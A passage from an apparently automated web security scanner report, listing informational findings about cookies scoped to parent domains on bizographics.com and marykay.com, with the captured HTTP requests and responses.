P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: image/gif;charset=UTF-8
Content-Length: 43
Date: Tue, 06 Sep 2011 15:32:49 GMT
Connection: close

GIF89a.............!.......,...........L..;

12.67. http://www.bizographics.com/collect/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /collect/?pid=901&url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&pageUrl=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio&time=1315341168499 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:33:01 GMT
Server: nginx/0.7.61
Set-Cookie: BizographicsID=""; Domain=.bizographics.com; Expires=Tue, 06-Sep-2011 15:33:02 GMT; Path=/
Set-Cookie: BizoID=""; Domain=.bizographics.com; Expires=Tue, 06-Sep-2011 15:33:02 GMT; Path=/
Set-Cookie: BizoData=""; Domain=.bizographics.com; Expires=Tue, 06-Sep-2011 15:33:02 GMT; Path=/
Set-Cookie: BizoCustomSegments=""; Domain=.bizographics.com; Expires=Tue, 06-Sep-2011 15:33:02 GMT; Path=/
Set-Cookie: BizographicsOptOut=OPT_OUT; Domain=.bizographics.com; Expires=Sun, 04-Sep-2016 15:33:01 GMT; Path=/
Content-Length: 9
Connection: keep-alive

//opt out

12.68. http://www.marykay.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?pid=mk HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 137
Content-Type: text/html; charset=utf-8
Location: /default.aspx?pid=mk
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: Subsidiary=US; path=/
Set-Cookie: TLTHID=9C5046FD4D123B0E95A0D3931B51113E; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:44 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:45 GMT; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/default.aspx?pid=mk">here</a>.</h2>
</body></html>

12.69. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /CONTENT/HPflash/Thumbs/tb_eyebundles.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CONTENT/HPflash/Thumbs/tb_eyebundles.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=8BD67EF641C6E545281FCD8A9E8619A7; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 880
Content-Type: image/jpeg
Last-Modified: Tue, 07 Jun 2011 19:44:24 GMT
Accept-Ranges: bytes
ETag: "8661ea4d4b25cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=B0890FBE43C33E288B82AEB1B9B92B68; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................#..
...[SNIP]...

12.70. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_makeupartist.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /CONTENT/HPflash/Thumbs/tb_makeupartist.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CONTENT/HPflash/Thumbs/tb_makeupartist.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=8BD67EF641C6E545281FCD8A9E8619A7; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 960
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:22:36 GMT
Accept-Ranges: bytes
ETag: "5fe4339c621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=D17FE5DF44B2B04AF2B926961FD1F468; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................#..
...[SNIP]...

12.71. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=8BD67EF641C6E545281FCD8A9E8619A7; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 920
Content-Type: image/jpeg
Last-Modified: Mon, 15 Aug 2011 19:40:43 GMT
Accept-Ranges: bytes
ETag: "ff998738835bcc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0F87CA454A59967B490C06993C603D8E; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................#..
...[SNIP]...

12.72. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_twrandr.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /CONTENT/HPflash/Thumbs/tb_twrandr.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CONTENT/HPflash/Thumbs/tb_twrandr.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=8BD67EF641C6E545281FCD8A9E8619A7; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 848
Content-Type: image/jpeg
Last-Modified: Mon, 01 Aug 2011 21:07:50 GMT
Accept-Ranges: bytes
ETag: "5da24128f50cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=CCFC47FF43ECAF98B4F799BC3EFBF379; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................#..
...[SNIP]...

12.73. http://www.marykay.com/Common/SiteCatalyst/marykaycom/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Common/SiteCatalyst/marykaycom/s_code.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Common/SiteCatalyst/marykaycom/s_code.js HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 41434
Content-Type: application/x-javascript
Last-Modified: Thu, 14 Jul 2011 12:43:01 GMT
Accept-Ranges: bytes
ETag: "8078f2902342cc1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:47 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

/* SiteCatalyst code version: H.23.3.
Copyright 1996-2011 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */
/************************ ADDITIONAL FEATURES ***********
...[SNIP]...

12.74. http://www.marykay.com/Content/HPflash/245_eyeColorBundle.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Content/HPflash/245_eyeColorBundle.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Content/HPflash/245_eyeColorBundle.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 45207
Content-Type: application/x-shockwave-flash
Last-Modified: Thu, 02 Jun 2011 09:19:26 GMT
Accept-Ranges: bytes
ETag: "9b534f2b621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=C626A75243F4FAE68012C595A3FF22D3; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

CWS.....x....XT..?z..F@BJBJRPzP.E:...nI.A....T..AB.$.)I.K    ......../.|..............9{.....X...9....j.h.....7.H.....a........9&/.{G71.$.l...,.......y.....O@TT.._.OP....q.vt7..qtca.bB[.a.f.j..n....*..u
...[SNIP]...

12.75. http://www.marykay.com/Content/HPflash/254_makeUpArtistLooks.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Content/HPflash/254_makeUpArtistLooks.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Content/HPflash/254_makeUpArtistLooks.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=A54BE6714B423AFBADF1DD9C59C8A29F; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 47134
Content-Type: application/x-shockwave-flash
Last-Modified: Thu, 02 Jun 2011 09:19:26 GMT
Accept-Ranges: bytes
ETag: "6318542b621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=2FCCB00347201A4BA3241398CB9DCDDF; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:46:00 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:46:00 GMT; path=/

CWS.Z...x...u\T..7~.$.)....i..i....SdDAE:..n..TA..EiAD@EDx.........{.?..>w......k...k.....
.t..."p....... .J#2...[Z..K.P.:9:{..-.j[OOWAvv...6.n6.w.vN...v..v..VP............Z.
.A...........
.63w.....
...[SNIP]...

12.76. http://www.marykay.com/Content/HPflash/324m_shopYourWay.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Content/HPflash/324m_shopYourWay.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Content/HPflash/324m_shopYourWay.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 33387
Content-Type: application/x-shockwave-flash
Last-Modified: Thu, 01 Sep 2011 15:00:31 GMT
Accept-Ranges: bytes
ETag: "4a6ad5e4b768cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=C7F280CB4F77F9D1ABACB09CB795199D; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

CWS.....x....<........=2".....BB    QQ..[.k6.^...%.B..l.R....-iP.E.^....................|..y....y..uC.]    ...@J.......q``@..D.`.     .|.....{1...yzy.@..p....-..x......8?......h..[....
..

..^..`.R...X...y....
...[SNIP]...

12.77. http://www.marykay.com/Content/HPflash/330m_%20FallTrend_eng.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Content/HPflash/330m_%20FallTrend_eng.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Content/HPflash/330m_%20FallTrend_eng.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 57149
Content-Type: application/x-shockwave-flash
Last-Modified: Tue, 30 Aug 2011 17:20:26 GMT
Accept-Ranges: bytes
ETag: "1d37901b3967cc1:d8265"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=42911DD449558CCD78D72F911671B024; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:55 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:56 GMT; path=/

CWS.,p..x..}    <.[...}.N..."IQ.U(....PM..3.E    ...J.vm....sK...fiOE...{...3..QM.{..........9....,.9..L0`j..:.(..    ....$wvv.SjH.$......6>*..:.......3.an.`.[...
.rC@.....n!............NP...D...m..6..F.<..7.
...[SNIP]...

12.78. http://www.marykay.com/Content/HPflash/373_TWNightCmpx.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Content/HPflash/373_TWNightCmpx.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Content/HPflash/373_TWNightCmpx.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=921B020F47FD8A57A88269A775E750F4; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 41595
Content-Type: application/x-shockwave-flash
Last-Modified: Wed, 20 Jul 2011 19:27:10 GMT
Accept-Ranges: bytes
ETag: "94cc2051347cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=DC6624BB4A5155A703619388F614872E; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:57 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:58 GMT; path=/

CWS.....x...wXS..7...4A..i...;
....*.$Hob. ...U...A...HQ@....*
RU:..w'...y.u.......Fw.g.*3k.....A.P.F.x3......(.....'..3..N2.J*..n..>2`K.....SFP......E.<...
KKK.
........>..}m...}...Xq...}..Q..(.wVl..
...[SNIP]...

12.79. http://www.marykay.com/Content/HPflash/502_mascaraWardrobe.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Content/HPflash/502_mascaraWardrobe.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Content/HPflash/502_mascaraWardrobe.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=19C9D0014D75852EFB8C9087C106B6A5; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 72922
Content-Type: application/x-shockwave-flash
Last-Modified: Thu, 02 Jun 2011 09:19:28 GMT
Accept-Ranges: bytes
ETag: "7387422c621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=B50F97234F63918E569F658373E875F1; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:55 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:56 GMT; path=/

CWS..F..x..z. ....{q.....D..n..do..{....Rv...eo..G({..QV(..."._...?.....9.y.9.y..y.sn0..\..=..yb@......s... .fi%zCF.......
.I0.xx..rqy{{sz.q:.Ys....pq.r..r.....N..>.N.L..0...............n~...C....X.G.
...[SNIP]...

12.80. http://www.marykay.com/Content/HPflash/502_moc.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Content/HPflash/502_moc.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Content/HPflash/502_moc.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 57038
Content-Type: application/x-shockwave-flash
Last-Modified: Tue, 28 Jun 2011 20:41:18 GMT
Accept-Ranges: bytes
ETag: "3640a0bbd335cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=7A24463C46D77F60A5600B87E247B550; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:54 GMT; path=/

CWS..k..x....\SI...Oz.E. M....."E.D..".DJ....AE......WQ.7l.".T.
..b.X...Fi.mIn.jt.......].9g...S.L.7......D....+.......cFj"....(..f..%Q.H{..........C..wT ..a.#@....|.#.#6..;.    ......(.....Ct..:.N...3..
...[SNIP]...

12.81. http://www.marykay.com/Content/HPflash/BoaB_miniAd.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Content/HPflash/BoaB_miniAd.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Content/HPflash/BoaB_miniAd.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
